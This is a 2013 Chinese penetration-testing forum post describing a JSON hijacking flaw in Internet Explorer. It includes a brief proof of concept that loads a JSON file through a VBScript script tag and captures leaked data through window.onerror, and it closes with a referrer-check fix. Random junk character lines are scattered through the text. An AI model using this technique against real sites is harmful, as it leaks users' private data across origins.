中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
; ]: I; \" [6 ~; [- W6 k
) S- D j6 _* v/ k1 I1 G! |
由于某些资源容器对数据处理不当导致json劫持漏洞.
4 n/ M! p8 @ @' R7 X* D7 ~' A2 R
详细说明:
& X) ~6 t/ P; C. q$ ^
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
* r) Q1 [/ F+ Z9 j/ y; o1 S. Q
<script language=vbscript></script>
4 F6 M1 r+ J' ^2 a
0 }2 a3 C' ^: t% \6 w# J3 c( P
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
4 t1 f5 M4 u1 i: g+ M
漏洞证明:
0 ~5 C, T- Y {: ^( _
<script>
@, F. d D7 q- A. O+ ^$ n, n
window.onerror=function(_){
+ ~9 l% I0 C) ~) Z/ f
alert(_)
. M$ h' i1 t/ y L% o9 k
}
: [3 Y# [6 o4 T6 _0 y2 C3 N% y4 Y8 @
</script>
9 |% n1 L/ m+ L5 X) P5 y
<script language=vbscript src=1.json></script>
$ w$ @7 s5 O, @' u
; T& }; }- x9 C' b u' C3 K3 Y
7 M' K/ E: c6 B- L# L; }
1.json:
3 N/ e1 \: z9 X1 F; \3 \
[{"name":"sogili","age":19}]
; h( i% {7 ?/ s
修复方案:
+ X! A J+ H* S% d* ~
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2